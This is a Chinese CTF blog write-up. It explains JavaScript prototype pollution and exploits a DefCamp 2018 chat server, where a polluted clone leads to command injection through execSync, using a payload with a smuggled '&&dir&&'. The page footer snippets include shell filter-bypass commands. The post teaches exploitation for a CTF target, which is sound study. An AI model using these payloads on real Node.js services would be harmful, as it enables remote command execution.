JavaScript Prototype污染攻击(CTF 例题分析)

最新推荐文章于 2023-08-05 13:14:59 发布
最新推荐文章于 2023-08-05 13:14:59 发布
阅读量1.9k 收藏 5
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a3320315/article/details/102883325
版权

0x01 先谈谈自己的理解

function a(){}   
var b=new a()
var c = {}

a.__proto__.__proto__ == b.__proto__.__proto__ == c.__proto__
a.__proto__ != b.__proto__ != c

  • 这个时候 b的__proto__ 指向的就是a.prototype
  • a.prototype__proto__指向的是Object.prototype
  • b的constructor 指向的也是 function a(){}
  • 而a它的__proto__ 指向是Function.prototype现在Function.prototype. constructor指向的是Function(){}
  • 上面的Function(){} 也有 __proto__ 指向 Function.prototype
  • Function.prototype的constructor指向的也是Function(){}
  • Function.prototype__proto__ 同时又指向Object.prototype
  • Object.prototype的 constructor 又是 Object
  • 这个 Object; 的 __proto__ 又 指向的是 Function.prototype
  • Object.prototypet的__proto__ 是null
  • 在补充一下a.constructor指向的是 Function
function Father() {
    this.first_name = 'Donald'
    this.last_name = 'Trump'
}

function Son() {
    this.first_name = 'Melania'
}

let son1 = new Son()
son1.__proto__                //object{...}
Son.prototype = new Father()
let son2 = new Son()
son.__proto__ 			  	//Object { first_name: "Donald", last_name: "Trump" }

总的来说prototype相当于其它语言面向对象中的继承父类
在这里插入图片描述


在这里插入图片描述

在这里插入图片描述
图片参考地址

0x02 原型链污染是什么

// foo是一个简单的JavaScript对象
let foo = {bar: 1}

// foo.bar 此时为1
console.log(foo.bar)            			    // 1

// 修改foo的原型(即Object)
foo.__proto__.bar = 2

// 由于查找顺序的原因,foo.bar仍然是1,先查找本身的属性,若没有再层层递进
console.log(foo.bar)		  				    //1

// 此时再用Object创建一个空的zoo对象
let zoo = {}					

// 查看zoo.bar
console.log(zoo.bar)							//2

0x03哪些情况下原型链会被污染?

1.对象`merge`
2.对象`clone`(其实内核就是将待操作的对象merge到一个空对象中)

以对象merge为例,我们想象一个简单的merge函数:

function merge(target, source) {
    for (let key in source) {
        if (key in source && key in target) {
            merge(target[key], source[key])
        } else {
            target[key] = source[key]
        }
    }
}

我们试试这个代码

let o1 = {}
let o2 = {a: 1, "__proto__": {b: 2}}
merge(o1, o2)
console.log(o1.a, o1.b)					// 1,2

o3 = {}
console.log(o3.b)                     //undefined
结果是,合并虽然成功了,但原型链没有被污染:

这是因为,我们用JavaScript创建o2的过程let o2 = {a: 1, "__proto__": {b: 2}}中,__proto__已经代表o2的原型了,此时遍历o2的所有键名,你拿到的是[a, b]__proto__并不是一个key,自然也不会修改Object的原型。
在这里插入图片描述
那么,如何让__proto__被认为是一个键名呢?
我们将代码改成这样:

let o1 = {}
let o2 = JSON.parse('{"a": 1, "__proto__": {"b": 2}}')
merge(o1, o2)
console.log(o1.a, o1.b)                // 1,2

o3 = {}
console.log(o3.b)						//2

这是因为,JSON解析的情况下,__proto__会被认为是一个真正的“键名”,而不代表“原型”,所以在遍历o2的时候会存在这个键。
merge操作是最常见可能控制键名的操作,也最能被原型链攻击,很多常见的库都存在这个问题。

0x04 例题分析

我们这儿以DefCamp CTF 2018 上的一道题目为例
大致看了一下,为一个聊天室的node.js代码

const io = require('socket.io-client')
const socket = io.connect('https://chat.dctfq18.def.camp')

if(process.argv.length != 4) {
  console.log('name and channel missing')
   process.exit()
}
console.log('Logging as ' + process.argv[2] + ' on ' + process.argv[3])
var inputUser = {
  name: process.argv[2],
};

socket.on('message', function(msg) {
  console.log(msg.from,"[", msg.channel!==undefined?msg.channel:'Default',"]", "says:\n", msg.message);
});

socket.on('error', function (err) {
  console.log('received socket error:')
  console.log(err)
})

socket.emit('register', JSON.stringify(inputUser));
socket.emit('message', JSON.stringify({ msg: "hello" }));
socket.emit('join', process.argv[3]);//ps: you should keep your channels private
socket.emit('message', JSON.stringify({ channel: process.argv[3], msg: "hello channel" }));
socket.emit('message', JSON.stringify({ channel: "test", msg: "i own you" }));

客户端的代码比较简单,我们继续跟进server.js的代码

getAscii: function(message) {
    var e = require('child_process');
    return e.execSync("cowsay '" + message + "'").toString();
}

发现一个很明显的命令执行漏洞,我们继续查看哪儿调用这个函数

client.on('join', function(channel) {
    try {
        clientManager.joinChannel(client, channel);
        sendMessageToClient(client,"Server", 
            "You joined channel", channel)

        var u = clientManager.getUsername(client);
        var c = clientManager.getCountry(client);

        sendMessageToChannel(channel,"Server", 
            helper.getAscii("User " + u + " living in " + c + " joined channel"))
    } catch(e) { console.log(e); client.disconnect() }
});

client.on('leave', function(channel) {
    try {
        client .join(channel);
        clientManager.leaveChannel(client, channel);
        sendMessageToClient(client,"Server", 
            "You left channel", channel)

        var u = clientManager.getUsername(client);
        var c = clientManager.getCountry(client);
        sendMessageToChannel(channel, "Server", 
            helper.getAscii("User " + u + " living in " + c + " left channel"))
    } catch(e) { console.log(e); client.disconnect() }
});

所以下一个问题则变成了如何控制变量 uc,即用户输入的 usernamecountry,但问题是不是这么简单呢?当然不是,服务端会对用户的输入做非常严格的校验:

validUser: function(inp) {
    var block = ["source","port","font","country",
                    "location","status","lastname"];
    if(typeof inp !== 'object') {
        return false;
    } 

    var keys = Object.keys(inp);
    for(var i = 0; i< keys.length; i++) {
        key = keys[i];

        if(block.indexOf(key) !== -1) {
            return false;
        }
    }

    var r =/^[a-z0-9]+$/gi;
    if(inp.name === undefined || !r.test(inp.name)) {
        return false;
    }

    return true;
}

我们可以CTRL+F查找有没有让我们可以进行Prototype污染攻击的地方,上文说了一般两个函数(merge,和clone)可以形成攻击环境

function clone(obj) {
    if (typeof obj !== 'object' || obj === null) {
        return obj;
    }

    var newObj;
    var cloneDeep = false;

    if (!Array.isArray(obj)) {
        if (Buffer.isBuffer(obj)) {
            newObj = new Buffer(obj);
        } else if (obj instanceof Date) {
            newObj = new Date(obj.getTime());
        } else if (obj instanceof RegExp) {
            newObj = new RegExp(obj);
        } else {
            var proto = Object.getPrototypeOf(obj);
            if (proto && proto.isImmutable) {
                newObj = obj;
            } else {
                newObj = Object.create(proto);
                cloneDeep = true;
            }
        }
    } else {
        newObj = [];
        cloneDeep = true;
    }

    if (cloneDeep) {
        var keys = Object.getOwnPropertyNames(obj);
        for (var i = 0; i < keys.length; ++i) {
            var key = keys[i];
            var descriptor = Object.getOwnPropertyDescriptor(obj, key);
            if (descriptor && (descriptor.get || descriptor.set)) {
                Object.defineProperty(newObj, key, descriptor);
            } else {
                newObj[key] = clone(obj[key]);
            }
        }
    }
    return newObj;
}

这儿明显clone可以利用,于是我们构造payload:node client.js {"__proto__":{name:213'&&dir&&'5}} 555,第二参数为进入聊天室的名字
在这里插入图片描述
我在windows上复现的,所以使用的dir命令。
在这里插入图片描述
复现成功!

HyyMbb
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf拼图例题-puzzle
04-13
关于puzzle例题的原题资源,搭配文章使用更配噢 https://editor.csdn.net/md/?articleId=124139016
CATCTF wife原型链污染
qq_51796436的博客
02-21 939
原型链污染原理:https://drun1baby.github.io/2022/12/29/JavaScript-%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/如下代码,prototype是newClass类的一个属性。newClass实例化的对象newObj的.__proto__指向newClass类的JSON 解析的情况下,__proto__会被认为是一个真正的“键名”,而不代表“原型”。如果是则__proto__会被认为是o2的原型。
实战:2019 0ctf final Web Writeup(一)
systemino的博客
07-04 997
前言 鸽了好久的题解,因为自己事务缠身,一直没时间写一下最近比赛的题解,趁近日有空,来填坑~ 第一次参加0ctf新星赛就拿了冠军,还是非常开心的。比赛过程中,web共4道题,我有幸做出3道,java实在不太擅长,哭了(另一道是ocaml的题目,涉及小trick和逻辑问题,准备放在后面和java一起编写(希望不要咕咕咕了)。这里写出另外两道题目的题解如下: 114514_calcalcalc ...
[BUUCTF][VNCTF2022公开赛]web wp
cosmoslin的博客
02-14 2357
GameV4.0 base64解码即可 newcalc0 镜像为node:lts-alpine,package.json全部为最新包 const express = require("express"); const path = require("path"); const vm2 = require("vm2"); const app = express(); app.use(express.urlencoded({ extended: true })); app.use(express.json(
[GYCTF2020]Ez_Express
snowlyzz的博客
09-03 593
JavaScript 原型链学习
XSS注入进阶练习篇(三) XSS原型链污染
好好睡觉
02-21 2307
原型链概念、原型连链污染概念、原型连污染示例
【web | CTF】攻防世界 wife_wife
weixin_46301214的博客
06-06 4038
我暂时没搞明白这题目意义何在,好像跟实战有点偏离的太远了,用JavaScript服务器来处理登录?账号密码不存放数据库?存缓存里?能让所有人注册管理员账号?太扯淡了。
祥云杯2022 pwn - protocol
z1r0的博客
11-09 1026
笔者这里的rop就是read(0, xxxxx, 0x50),execve(“xxxx”, 0, 0)来getshell。在拷贝username和password的时候发生了栈溢出漏洞,因为username和password可控。直接放rop的话是不行的,因为\x00在strcpy中会被截断,所以倒着写rop。一开始没看出来是Protobuf,搜了一圈里面的东西才知道是Protobuf。首先需要得到ctf.proto这个东西然后按着下面的顺序就行。这个时候就可以得到一个ctf.proto的文件。
CTF密码学之JS
Unitue_逆流
01-26 741
1、右击–查看源文件,将源文件复制粘贴到控制台 2、点击Console进入控制台,将eval改为document.write点击Enter执行,如图: 得出key值
CTF】Python原型链污染
Luminous_song的博客
08-05 670
在Python中每个对象都有一个原型,原型上定义了对象可以访问的属性和方法。当对象访问属性或方法时,会先在自身查找,如果找不到就会去原型链上的上级对象中查找,原型链污染攻击的思路是通过修改对象原型链中的属性,使得程序在访问属性或方法时得到不符合预期的结果。
一道冰蝎文件流量分析例题
最新发布
09-01
一道冰蝎文件流量分析例题
CTF例题.zip
10-31
CTF例题.zip 里面有分类的几道ctf经典题型,可以拿来练练手,网上都能找到答案
CTF之常见密码学攻击手法和实现.md
10-24
CTF-crypto-入门-密码学
CTF 隐写术经典例题讲解
10-22
该内容为CTF赛题隐写术经理例题讲解,包含图片隐写,流量分析,文件查看,文件分离,加密解密等多种题型讲解,图文结合,适合新手学习。
CTF gopher协议
a3320315的博客
11-03 7185
0x01 例题 这儿举例安恒的一道月题 tips:利用ssrf,gopher打内网 0x02 贴出代码 <?php highlight_file(__FILE__); $x = $_GET['x']; $pos = strpos($x,"php"); if($pos){ exit("denied"); } $ch = curl_init(); curl_setopt($ch,...
CTF比赛中,命令中空格被过滤的解决方法
a3320315的博客
08-19 6511
1、linux {cat,flag.txt} cat${IFS}flag.txt cat$IFS$9flag.txt cat<flag.txt cat<>flag.txt kg=$'\x20flag.txt'&&cat$kg (\x20转换成字符串就是空格,这里通过变量的方式巧妙绕过) 2、windows下 (实用性不是很广,也就type这个命令可以用) ty...
攻防世界 Web_php_unserialize的坑
a3320315的博客
09-26 3406
题目要求传入的参数先base64解码,然后再反序列化。 题目中的class有一个私有变量,我知道最后打印出来的序列化内容会在类名前后加%00。 (ps:以前做相关序列化的题是直接GET传入参数,所以浏览器自动解码%00)但是今天我是先把%00加进去再去别的网站进行base64编码,这就是问题所在,编码时不会把%00当做一个特殊字符,结果就是死活不对。其实直接在php里面编码就行了。(菜得真实) ...
2020第五空间 web writeup
a3320315的博客
06-27 3260
hate-php 源码 <?php error_reporting(0); if(!isset($_GET['code'])){ highlight_file(__FILE__); }else{ $code = $_GET['code']; if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) { die('You are too good for me');
HFCTF2020 web writeup
a3320315的博客
04-21 3048
easy_login just_escape 进入这个页面 然后显示的是一个php的任意代码执行的页面,但是经过测试,这个根本就是php,其实题目也有提示 我们输入Error().stack 可以根据回显得到,这是一个JS的vm2,而且经过测试许多关键字都被过滤 所以我们使用字符串拼接就可以了~~ 然后我们去网上找一下关于vm2的payload 所以最终的payload为: (function (...
ctf 监听端口_SSRF 漏洞分析与利用(含 CTF 例题
06-07
下面我们将通过一个CTF例题来演示如何利用SSRF漏洞进行端口扫描。 1. 环境搭建 我们可以使用Docker来搭建漏洞环境,具体步骤如下: 1)拉取Docker镜像 ``` docker pull bluetonem/hackme-ssrf ``` 2)启动容器 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值